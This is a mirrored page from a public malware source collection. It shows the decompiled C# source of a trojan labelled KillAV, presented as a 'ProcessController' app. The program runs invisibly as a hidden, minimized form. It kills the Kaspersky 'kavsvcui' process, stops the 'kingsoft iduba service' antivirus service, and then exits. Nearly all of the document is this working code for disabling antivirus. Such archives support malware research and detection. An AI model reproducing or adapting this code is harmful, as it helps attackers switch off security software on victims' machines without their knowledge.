mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 16:05:27 +00:00
188 lines
5.5 KiB
C#
188 lines
5.5 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: ProcessController.WindowsApplication1.MainForm
|
|||
|
// Assembly: ProcessController, Version=1.0.1074.17747, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A7E7AFFD-A1DC-488C-AB9F-AD97FAEE0D10
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.KillAV.t-53998dd36d7386675343b9db1e5d7a198613fef641d5cfbb322386108a60238a.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.Collections;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Drawing;
|
|||
|
using System.Resources;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.ServiceProcess;
|
|||
|
using System.Threading;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace ProcessController.WindowsApplication1
|
|||
|
{
|
|||
|
public class MainForm : Form
|
|||
|
{
|
|||
|
[AccessedThroughProperty("OpenFile")]
|
|||
|
private OpenFileDialog _OpenFile;
|
|||
|
private IContainer components;
|
|||
|
private string TempMachineName;
|
|||
|
private Process SelectProcess;
|
|||
|
private Hashtable Processes;
|
|||
|
private System.Windows.Forms.Timer WatchDog;
|
|||
|
|
|||
|
internal virtual OpenFileDialog OpenFile
|
|||
|
{
|
|||
|
[MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
{
|
|||
|
if (this._OpenFile == null)
|
|||
|
;
|
|||
|
this._OpenFile = value;
|
|||
|
if (this._OpenFile == null)
|
|||
|
;
|
|||
|
}
|
|||
|
get => this._OpenFile;
|
|||
|
}
|
|||
|
|
|||
|
[STAThread]
|
|||
|
public static void Main() => Application.Run((Form) new MainForm());
|
|||
|
|
|||
|
public MainForm()
|
|||
|
{
|
|||
|
this.Load += new EventHandler(this.MainForm_Load);
|
|||
|
this.TempMachineName = Environment.MachineName;
|
|||
|
this.Processes = new Hashtable();
|
|||
|
this.WatchDog = new System.Windows.Forms.Timer();
|
|||
|
this.InitializeComponent();
|
|||
|
}
|
|||
|
|
|||
|
protected override void Dispose(bool disposing)
|
|||
|
{
|
|||
|
if (disposing && this.components != null)
|
|||
|
this.components.Dispose();
|
|||
|
base.Dispose(disposing);
|
|||
|
}
|
|||
|
|
|||
|
private void InitializeComponent()
|
|||
|
{
|
|||
|
this.components = (IContainer) new System.ComponentModel.Container();
|
|||
|
ResourceManager resourceManager = new ResourceManager(typeof (MainForm));
|
|||
|
this.OpenFile = new OpenFileDialog();
|
|||
|
this.AutoScale = false;
|
|||
|
Size size = new Size(6, 14);
|
|||
|
this.AutoScaleBaseSize = size;
|
|||
|
size = new Size(0, 0);
|
|||
|
this.ClientSize = size;
|
|||
|
this.ControlBox = false;
|
|||
|
this.FormBorderStyle = FormBorderStyle.None;
|
|||
|
this.MaximizeBox = false;
|
|||
|
this.Name = nameof (MainForm);
|
|||
|
this.ShowInTaskbar = false;
|
|||
|
this.SizeGripStyle = SizeGripStyle.Hide;
|
|||
|
this.WindowState = FormWindowState.Minimized;
|
|||
|
}
|
|||
|
|
|||
|
private void MainForm_Load(object sender, EventArgs e)
|
|||
|
{
|
|||
|
this.StopProcesses();
|
|||
|
this.StopServices();
|
|||
|
Application.Exit();
|
|||
|
}
|
|||
|
|
|||
|
public void StopProcesses()
|
|||
|
{
|
|||
|
this.WatchDog.Enabled = false;
|
|||
|
this.Processes.Clear();
|
|||
|
this.Processes = new Hashtable();
|
|||
|
try
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses(this.TempMachineName);
|
|||
|
int index = 0;
|
|||
|
while (index < processes.Length)
|
|||
|
{
|
|||
|
Process process = processes[index];
|
|||
|
if (StringType.StrCmp(process.ProcessName.ToLower().Trim(), "kavsvcui", false) == 0)
|
|||
|
process.Kill();
|
|||
|
else
|
|||
|
this.Processes.Add((object) process.Id.ToString(), (object) process);
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (Process process in (IEnumerable) this.Processes.Values)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
process.EnableRaisingEvents = true;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
IEnumerator enumerator;
|
|||
|
if (enumerator is IDisposable)
|
|||
|
((IDisposable) enumerator).Dispose();
|
|||
|
}
|
|||
|
this.WatchDog.Enabled = true;
|
|||
|
this.Processes.Clear();
|
|||
|
}
|
|||
|
|
|||
|
public void StopServices()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
ServiceController[] services = ServiceController.GetServices(this.TempMachineName);
|
|||
|
int index = 0;
|
|||
|
while (index < services.Length)
|
|||
|
{
|
|||
|
ServiceController serviceController = services[index];
|
|||
|
object lower = (object) serviceController.DisplayName.Trim().ToLower();
|
|||
|
if (serviceController.Status == ServiceControllerStatus.Running)
|
|||
|
{
|
|||
|
if (ObjectType.ObjTst(lower, (object) "kingsoft iduba service", false) == 0)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (serviceController.CanStop)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
serviceController.Stop();
|
|||
|
Thread.Sleep(500);
|
|||
|
while (serviceController.Status == ServiceControllerStatus.StopPending)
|
|||
|
Application.DoEvents();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|